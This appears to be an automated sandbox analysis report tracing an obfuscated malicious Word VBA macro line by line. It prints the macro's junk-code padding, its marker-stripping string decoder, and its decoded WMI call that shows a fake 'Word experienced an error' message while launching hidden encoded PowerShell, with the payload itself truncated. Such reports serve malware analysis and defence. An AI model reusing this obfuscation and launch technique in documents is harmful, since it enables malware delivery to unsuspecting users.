                                            Thriap3q9rgf3yy9y

                                            zZuzBZGD

                                            CreateObject

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            OIbfvEEFF

                                            Close

                                            eLmLDU

                                            FYVZFEH

                                            CreateObject

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            hoyzuBGCP

                                            Close

                                            lADFBaJ

                                            Strings    Decrypted Strings
                                            Line    Instruction    Meta Information
                                            2

                                            Function G8xesq0b8jlsfrsp()

                                            3

                                            On Error Resume Next

                                            executed
                                            4

                                            Dhubl2is48jort = "Jsnt2t9fi0a8nnsiaf" + "Bete9x47doew46v"

                                            5

                                            sf4 = Zw1k7hcmdl66 + A5gd21klfqu9c6rs.StoryRanges.Item(2 / 2) + Hyii7r76oq89

                                            Zw1k7hcmdl66

                                            Item

                                            Hyii7r76oq89

                                            6

                                            Goto SblcDCC

                                            7

                                            Dim pULquU as Object

                                            8

                                            Set ibIiBF = diCXTi

                                            diCXTi

                                            9

                                            Set pULquU = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            10

                                            Dim SblcDCC as Object

                                            11

                                            Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")

                                            CreateTextFile

                                            12

                                            SblcDCC.WriteLine "VrVKCjefsIJ"

                                            WriteLine

                                            13

                                            SblcDCC.WriteLine "sxbwAfRtWJI"

                                            WriteLine

                                            14

                                            SblcDCC.WriteLine "WLXLJnjItPGPZJ"

                                            WriteLine

                                            15

                                            Set jbUmDI = NZiApKAp

                                            NZiApKAp

                                            16

                                            SblcDCC.Close

                                            Close

                                            17

                                            Set pULquU = Nothing

                                            18

                                            Set MznOjBB = vrYYHIDxI

                                            vrYYHIDxI

                                            19

                                            Set SblcDCC = Nothing

                                            19

                                            SblcDCC:

                                            21

                                            t3s = "]anw[3" + "p]anw[3"

                                            22

                                            K50yjh8o6l7s = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"

                                            23

                                            Goto fNhiCVgGS

                                            24

                                            Dim RyDBDK as Object

                                            25

                                            Set WTbkNqFa = gzTFLxb

                                            gzTFLxb

                                            26

                                            Set RyDBDK = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            27

                                            Dim fNhiCVgGS as Object

                                            28

                                            Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")

                                            CreateTextFile

                                            29

                                            fNhiCVgGS.WriteLine "ImJJdfAtdFHCh"

                                            WriteLine

                                            30

                                            fNhiCVgGS.WriteLine "deVdMyoREdgzCaJb"

                                            WriteLine

                                            31

                                            fNhiCVgGS.WriteLine "XZzpBRpDKuMgsGHIHF"

                                            WriteLine

                                            32

                                            Set OlapGi = PjNhJNA

                                            PjNhJNA

                                            33

                                            fNhiCVgGS.Close

                                            Close

                                            34

                                            Set RyDBDK = Nothing

                                            35

                                            Set yabVbA = oAaNlB

                                            oAaNlB

                                            36

                                            Set fNhiCVgGS = Nothing

                                            36

                                            fNhiCVgGS:

                                            38

                                            Brlo236t2rmfu = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"

                                            39

                                            Goto HCvCmAcHC

                                            40

                                            Dim iFTmFHFH as Object

                                            41

                                            Set UDSpFHqFJ = sySRJ

                                            sySRJ

                                            42

                                            Set iFTmFHFH = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            43

                                            Dim HCvCmAcHC as Object

                                            44

                                            Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")

                                            CreateTextFile

                                            45

                                            HCvCmAcHC.WriteLine "uTtCAFwHpCGF"

                                            WriteLine

                                            46

                                            HCvCmAcHC.WriteLine "lwWhZGEasjsS"

                                            WriteLine

                                            47

                                            HCvCmAcHC.WriteLine "MiCjaGqJfPrI"

                                            WriteLine

                                            48

                                            Set MmSDYCkJR = UwyYSBsBN

                                            UwyYSBsBN

                                            49

                                            HCvCmAcHC.Close

                                            Close

                                            50

                                            Set iFTmFHFH = Nothing

                                            51

                                            Set EISYDDB = tpOgXmm

                                            tpOgXmm

                                            52

                                            Set HCvCmAcHC = Nothing

                                            52

                                            HCvCmAcHC:

                                            54

                                            Iogna_9cq5gv = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"

                                            55

                                            Goto gEcrV

                                            56

                                            Dim RqlOZAHRJ as Object

                                            57

                                            Set jsYAGBJAF = MHYlQAD

                                            MHYlQAD

                                            58

                                            Set RqlOZAHRJ = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            59

                                            Dim gEcrV as Object

                                            60

                                            Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")

                                            CreateTextFile

                                            61

                                            gEcrV.WriteLine "dXFPCSYtSNB"

                                            WriteLine

                                            62

                                            gEcrV.WriteLine "KqVyuQQfwTWh"

                                            WriteLine

                                            63

                                            gEcrV.WriteLine "qDaYIDDSZQMTaO"

                                            WriteLine

                                            64

                                            Set IePCGy = GznGGHyG

                                            GznGGHyG

                                            65

                                            gEcrV.Close

                                            Close

                                            66

                                            Set RqlOZAHRJ = Nothing

                                            67

                                            Set cwsTFPCH = bbsIZ

                                            bbsIZ

                                            68

                                            Set gEcrV = Nothing

                                            68

                                            gEcrV:

                                            70

                                            Fo4b_d8mj9usjgaha = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"

                                            Mid

                                            Name

                                            Application

                                            71

                                            Goto ZMdrVHGz

                                            72

                                            Dim xsruLB as Object

                                            73

                                            Set fiyQuiRBI = swNGWdd

                                            swNGWdd

                                            74

                                            Set xsruLB = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            75

                                            Dim ZMdrVHGz as Object

                                            76

                                            Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")

                                            CreateTextFile

                                            77

                                            ZMdrVHGz.WriteLine "MxCpGaGqBgemCAFEJ"

                                            WriteLine

                                            78

                                            ZMdrVHGz.WriteLine "hbtzFRJEXyDCXI"

                                            WriteLine

                                            79

                                            ZMdrVHGz.WriteLine "zdTcdOoXXUFHJK"

                                            WriteLine

                                            80

                                            Set xPBGH = rJEkbLH

                                            rJEkbLH

                                            81

                                            ZMdrVHGz.Close

                                            Close

                                            82

                                            Set xsruLB = Nothing

                                            83

                                            Set dLRiF = vEBqHrDnD

                                            vEBqHrDnD

                                            84

                                            Set ZMdrVHGz = Nothing

                                            84

                                            ZMdrVHGz:

                                            86

                                            K427k3xfk130n18n = Iogna_9cq5gv + Fo4b_d8mj9usjgaha + Brlo236t2rmfu + t3s + K50yjh8o6l7s

                                            87

                                            Goto fDZVKAAc

                                            88

                                            Dim tzErBRFe as Object

                                            89

                                            Set SeHafBC = tWcKo

                                            tWcKo

                                            90

                                            Set tzErBRFe = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            91

                                            Dim fDZVKAAc as Object

                                            92

                                            Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")

                                            CreateTextFile

                                            93

                                            fDZVKAAc.WriteLine "hKlajOujwgDFAA"

                                            WriteLine

                                            94

                                            fDZVKAAc.WriteLine "JMgUDAIEJlgyNBH"

                                            WriteLine

                                            95

                                            fDZVKAAc.WriteLine "BUUJYAAIoJvLBLAo"

                                            WriteLine

                                            96

                                            Set CHVmaVC = LzxxRHG

                                            LzxxRHG

                                            97

                                            fDZVKAAc.Close

                                            Close

                                            98

                                            Set tzErBRFe = Nothing

                                            99

                                            Set WlBWDXGD = EKezHIC

                                            EKezHIC

                                            100

                                            Set fDZVKAAc = Nothing

                                            100

                                            fDZVKAAc:

                                            102

                                            Lutf6_3d403q9 = Jlda77h_v8nx5(K427k3xfk130n18n)

                                            103

                                            Goto rYbgBh

                                            104

                                            Dim hZCth as Object

                                            105

                                            Set LQqlBAHD = DpYbmDA

                                            DpYbmDA

                                            106

                                            Set hZCth = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            107

                                            Dim rYbgBh as Object

                                            108

                                            Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")

                                            CreateTextFile

                                            109

                                            rYbgBh.WriteLine "CVbRCAAhkhmcDG"

                                            WriteLine

                                            110

                                            rYbgBh.WriteLine "XrrAwQZPjqB"

                                            WriteLine

                                            111

                                            rYbgBh.WriteLine "fxSJajCGlWUEBW"

                                            WriteLine

                                            112

                                            Set phIwFD = hDJDJ

                                            hDJDJ

                                            113

                                            rYbgBh.Close

                                            Close

                                            114

                                            Set hZCth = Nothing

                                            115

                                            Set PnolTIbAB = dXiwA

                                            dXiwA

                                            116

                                            Set rYbgBh = Nothing

                                            116

                                            rYbgBh:

                                            118

                                            Set Mwzin4vxc1irit = CreateObject(Lutf6_3d403q9)

                                            CreateObject("winmgmts:win32_process")

                                            executed
                                            119

                                            Goto GfRPP

                                            120

                                            Dim xLQtMd as Object

                                            121

                                            Set uRnkDGJ = hFSyAfFrF

                                            hFSyAfFrF

                                            122

                                            Set xLQtMd = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            123

                                            Dim GfRPP as Object

                                            124

                                            Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")

                                            CreateTextFile

                                            125

                                            GfRPP.WriteLine "qiXBsMBsLJGbX"

                                            WriteLine

                                            126

                                            GfRPP.WriteLine "mehEFPFHcklgJDDx"

                                            WriteLine

                                            127

                                            GfRPP.WriteLine "BndJDkuVYF"

                                            WriteLine

                                            128

                                            Set xiFRA = hXxQDACJA

                                            hXxQDACJA

                                            129

                                            GfRPP.Close

                                            Close

                                            130

                                            Set xLQtMd = Nothing

                                            131

                                            Set jENfzNH = xkQqDXCcD

                                            xkQqDXCcD

                                            132

                                            Set GfRPP = Nothing

                                            132

                                            GfRPP:

                                            134

                                            Jaaqx1xn5daotw = Mid(sf4, (1 + 4), Len(sf4))

                                            Mid

                                            Len(sf4) -> 17689

                                            executed
                                            135

                                            Goto sCOIGDtD

                                            136

                                            Dim eepvDEaE as Object

                                            137

                                            Set jzqBlGW = lBenBDA

                                            lBenBDA

                                            138

                                            Set eepvDEaE = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            139

                                            Dim sCOIGDtD as Object

                                            140

                                            Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")

                                            CreateTextFile

                                            141

                                            sCOIGDtD.WriteLine "JTSPCDjykfL"

                                            WriteLine

                                            142

                                            sCOIGDtD.WriteLine "bBmgOCvPPojGGC"

                                            WriteLine

                                            143

                                            sCOIGDtD.WriteLine "anBQXljzGenE"

                                            WriteLine

                                            144

                                            Set tAmQHxlD = UavHTIBHo

                                            UavHTIBHo

                                            145

                                            sCOIGDtD.Close

                                            Close

                                            146

                                            Set eepvDEaE = Nothing

                                            147

                                            Set gphNDVZp = IcAHwPH

                                            IcAHwPH

                                            148

                                            Set sCOIGDtD = Nothing

                                            148

                                            sCOIGDtD:

                                            150

                                            Goto fmwdEMADQ

                                            151

                                            Dim DkLoDL as Object

                                            152

                                            Set plqkuDI = BNmrm

                                            BNmrm

                                            153

                                            Set DkLoDL = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            154

                                            Dim fmwdEMADQ as Object

                                            155

                                            Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")

                                            CreateTextFile

                                            156

                                            fmwdEMADQ.WriteLine "dnUnKFHAkIOdD"

                                            WriteLine

                                            157

                                            fmwdEMADQ.WriteLine "ekluIEBJFIgoBcGC"

                                            WriteLine

                                            158

                                            fmwdEMADQ.WriteLine "BnxHFzJCGhVHrFIm"

                                            WriteLine

                                            159

                                            Set jPJENIo = FLtYjKHC

                                            FLtYjKHC

                                            160

                                            fmwdEMADQ.Close

                                            Close

                                            161

                                            Set DkLoDL = Nothing

                                            162

                                            Set ANzGyzCD = qAUhkIMz

                                            qAUhkIMz

                                            163

                                            Set fmwdEMADQ = Nothing

                                            163

                                            fmwdEMADQ:

                                            165

                                            Mwzin4vxc1irit.Create Jlda77h_v8nx5(Jaaqx1xn5daotw), V2enhc4htwl7z6bh, Thriap3q9rgf3yy9y

                                            SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD [...]",,) -> 0

                                            V2enhc4htwl7z6bh

                                            Thriap3q9rgf3yy9y

                                            executed
                                            166

                                            Goto pkixJADG

                                            167

                                            Dim DhnHIY as Object

                                            168

                                            Set oQgLUI = zZuzBZGD

                                            zZuzBZGD

                                            169

                                            Set DhnHIY = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            170

                                            Dim pkixJADG as Object

                                            171

                                            Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")

                                            CreateTextFile

                                            172

                                            pkixJADG.WriteLine "fDdPHEjBEnAdZqZFJ"

                                            WriteLine

                                            173

                                            pkixJADG.WriteLine "wypNISsWSXthFJCq"

                                            WriteLine

                                            174

                                            pkixJADG.WriteLine "LvnHAGHfIhRDBRAF"

                                            WriteLine

                                            175

                                            Set ecGmY = OIbfvEEFF

                                            OIbfvEEFF

                                            176

                                            pkixJADG.Close

                                            Close

                                            177

                                            Set DhnHIY = Nothing

                                            178

                                            Set EKmLA = eLmLDU

                                            eLmLDU

                                            179

                                            Set pkixJADG = Nothing

                                            179

                                            pkixJADG:

                                            181

                                            Goto KmGOADt

                                            182

                                            Dim CFdSBD as Object

                                            183

                                            Set nhLeJMLfI = FYVZFEH

                                            FYVZFEH

                                            184

                                            Set CFdSBD = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                            CreateObject

                                            185

                                            Dim KmGOADt as Object

                                            186

                                            Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")

                                            CreateTextFile

                                            187

                                            KmGOADt.WriteLine "DBvMcNtCcMyJDDI"

                                            WriteLine

                                            188

                                            KmGOADt.WriteLine "eXpjHFapHaPdRJu"

                                            WriteLine

                                            189

                                            KmGOADt.WriteLine "eXObOTlBAITEOIo"

                                            WriteLine

                                            190

                                            Set STzBjwICv = hoyzuBGCP

                                            hoyzuBGCP

                                            191

                                            KmGOADt.Close

                                            Close

                                            192

                                            Set CFdSBD = Nothing

                                            193

                                            Set ORLICIl = lADFBaJ

                                            lADFBaJ

                                            194

                                            Set KmGOADt = Nothing

                                            194

                                            KmGOADt:

                                            196

                                            End Function

                                            APIs / Meta Information

                                            SQQWY

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Strings | Decrypted Strings
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "OiBXGJB:\pnqsZEDV\gsZoAW.EePnB"
                                            "eEWdaDQVJJqTHgF"
                                            "OyFBLhlWUnD"
                                            "TBKmUCEXTUIGu"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "OBoYzRpef:\sDLuJ\bmIQSG.MdmDR"
                                            "NeiIGCNWgICn"
                                            "EgxfIDVQbJotWhj"
                                            "UjBKOEDRIbiWFB"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD"
                                            "RhnJRGeBNASBQHHGF"
                                            "WNFUDvHgghFdup"
                                            "eeVVJBMGlcfXMB"
                                            "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                            "CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC"
                                            "ptABFEZDmkMVIeD"
                                            "vVbvIHcFGEAJJ"
                                            "NisSEYrcDlKQUITa"
                                            Line | Instruction | Meta Information
                                            197 | Function Jlda77h_v8nx5(Wwsqkhmtfcf3_y) |
                                            198 | On Error Resume Next | executed
                                            199 | Goto PbhYVsA |
                                            200 | Dim PcHRGIADo as Object |
                                            201 | Set TXmxvp = SQQWY |
                                            202 | Set PcHRGIADo = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3")) |
                                            203 | Dim PbhYVsA as Object |
                                            204 | Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB") |
                                            205 | PbhYVsA.WriteLine "eEWdaDQVJJqTHgF" |
                                            206 | PbhYVsA.WriteLine "OyFBLhlWUnD" |
                                            207 | PbhYVsA.WriteLine "TBKmUCEXTUIGu" |
                                            208 | Set qHKYGHlFA = ddanFDWJf |
                                            209 | PbhYVsA.Close |
                                            210 | Set PcHRGIADo = Nothing |
                                            211 | Set sPkIwu = RhztCF |
                                            212 | Set PbhYVsA = Nothing |
                                            212 | PbhYVsA: |
                                            214 | Gqzsjl136wugk27i9 = Wwsqkhmtfcf3_y |
                                            215 | Goto NuebA |
                                            216 | Dim sTzDC as Object |
                                            217 | Set GIAKA = kwzjKvZHe |
                                            218 | Set sTzDC = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3")) |
                                            219 | Dim NuebA as Object |
                                            220 | Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR") |
                                            221 | NuebA.WriteLine "NeiIGCNWgICn" |
                                            222 | NuebA.WriteLine "EgxfIDVQbJotWhj" |
                                            223 | NuebA.WriteLine "UjBKOEDRIbiWFB" |
                                            224 | Set idbaDIr = inIcjJtaF |
                                            225 | NuebA.Close |
                                            226 | Set sTzDC = Nothing |
                                            227 | Set KXwaABT = zBSWCKmJv |
                                            228 | Set NuebA = Nothing |
                                            228 | NuebA: |
                                            230 | Gnc9qzz9241pnhfi = Hrs2a1p95u19(Gqzsjl136wugk27i9) |
                                            231 | Goto gxBPJB |
                                            232 | Dim zxgLHJSFW as Object |
                                            233 | Set quDoH = KXTliE |
                                            234 | Set zxgLHJSFW = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3")) |
                                            235 | Dim gxBPJB as Object |
                                            236 | Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD") |
                                            237 | gxBPJB.WriteLine "RhnJRGeBNASBQHHGF" |
                                            238 | gxBPJB.WriteLine "WNFUDvHgghFdup" |
                                            239 | gxBPJB.WriteLine "eeVVJBMGlcfXMB" |
                                            240 | Set nleaHR = YZllAeRe |
                                            241 | gxBPJB.Close |
                                            242 | Set zxgLHJSFW = Nothing |
                                            243 | Set mgTNFCq = hjZwD |
                                            244 | Set gxBPJB = Nothing |
                                            244 | gxBPJB: |
                                            246 | Jlda77h_v8nx5 = Gnc9qzz9241pnhfi |
                                            247 | Goto mgrwfmN |
                                            248 | Dim RjiQHRA as Object |
                                            249 | Set EhCMG = FUyIHBDFz |
                                            250 | Set RjiQHRA = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3")) |
                                            251 | Dim mgrwfmN as Object |

                                            252

                                            Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")

                                            CreateTextFile

                                            CreateTextFile

                                            CreateTextFile

                                            CreateTextFile

                                            CreateTextFile

                                            253

                                            mgrwfmN.WriteLine "ptABFEZDmkMVIeD"

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            254

                                            mgrwfmN.WriteLine "vVbvIHcFGEAJJ"

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            255

                                            mgrwfmN.WriteLine "NisSEYrcDlKQUITa"

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            256

                                            Set MNihxICY = AiRdGDAJ

                                            AiRdGDAJ

                                            AiRdGDAJ

                                            AiRdGDAJ

                                            AiRdGDAJ

                                            AiRdGDAJ

                                            257

                                            mgrwfmN.Close

                                            Close

                                            Close

                                            Close

                                            Close

                                            Close

                                            258

                                            Set RjiQHRA = Nothing

                                            259

                                            Set wTMSLyWFG = AioOpBFE

                                            AioOpBFE

                                            AioOpBFE

                                            AioOpBFE

                                            AioOpBFE

                                            AioOpBFE

                                            260

                                            Set mgrwfmN = Nothing

                                            260

                                            mgrwfmN:

                                            262

                                            End Function

                                            APIs    Meta Information

                                            Pg5minli2d3c9

                                            sreXHFD

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                            CreateTextFile

                                            WriteLine

                                            WriteLine

                                            WriteLine

                                            eCIzUDyJ

                                            Close

                                            yJmmmVIAG

                                            Replace

                                            Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process

                                            Replace("[obfuscated command string elided]","]anw[3",) -> cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD

                                            Ij2hesgjee57d3s0

                                            uVItICICB

                                            CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                            Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

